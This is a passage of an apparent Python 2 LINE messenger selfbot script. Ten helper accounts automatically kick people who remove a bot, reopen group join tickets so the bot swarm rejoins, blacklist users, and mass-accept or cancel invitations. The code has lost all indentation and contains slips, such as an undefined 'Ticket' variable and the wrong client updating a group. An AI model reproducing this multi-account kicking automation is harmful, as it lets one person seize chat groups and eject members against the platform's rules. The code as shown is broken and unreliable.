if op.param3 in Amid4:
if op.param2 in Amid5:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in Amid5:
if op.param2 in Amid6:
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in Amid6:
if op.param2 in Amid7:
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in Amid7:
if op.param2 in Amid8:
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in Amid8:
if op.param2 in Amid9:
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in Amid9:
if op.param2 in Amid10:
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.param3 in Amid10:
if op.param2 in Amid1:
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
#===========================================
if op.type == 32:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SELF BOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SEL FBOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid1 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki1.cancelGroupInvitation(op.param1, matched_list)
if Amid2 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki2.cancelGroupInvitation(op.param1, matched_list)
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots:
if wait["protectionOn"] == True:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl1.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.1)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl1.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl1.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki1.getGroup(op.param1)
G.preventJoinByTicket = False
ki1.updateGroup(G)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid1 in op.param3:
if op.param2 in Bots:
pass
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ticket = ki1.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid2 in op.param3:
if op.param2 in Bots:
pass
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ticket = ki2.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid3 in op.param3:
if op.param2 in Bots:
pass
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid4 in op.param3:
if op.param2 in Bots:
pass
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid5 in op.param3:
if op.param2 in Bots:
pass
try:
ki6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid6 in op.param3:
if op.param2 in Bots:
pass
try:
ki7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ticket = ki6.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid7 in op.param3:
if op.param2 in Bots:
pass
try:
ki8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = True
ki7.updateGroup(X)
Ticket = ki7.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid8 in op.param3:
if op.param2 in Bots:
pass
try:
ki9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ticket = ki8.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid9 in op.param3:
if op.param2 in Bots:
pass
try:
ki10.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ticket = ki9.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid10 in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ticket = ki10.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if op.type == 13:
if mid in op.param3:
if wait["pautoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to, "error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[ChatBOT] " + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "\n" + str(wait["tag1"]) , cName + "\n" + str(wait["tag2"])]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Dont Tag Me!! Im Busy",cName + ""]
ret_ = "[Auto] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
msg.contentType = 7
msg.text = ''
msg.contentMetadata = {
'STKPKGID': '9662',
'STKTXT': '[]',
'STKVER': '16',
'STKID':'697'
}
cl.sendMessage(msg)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
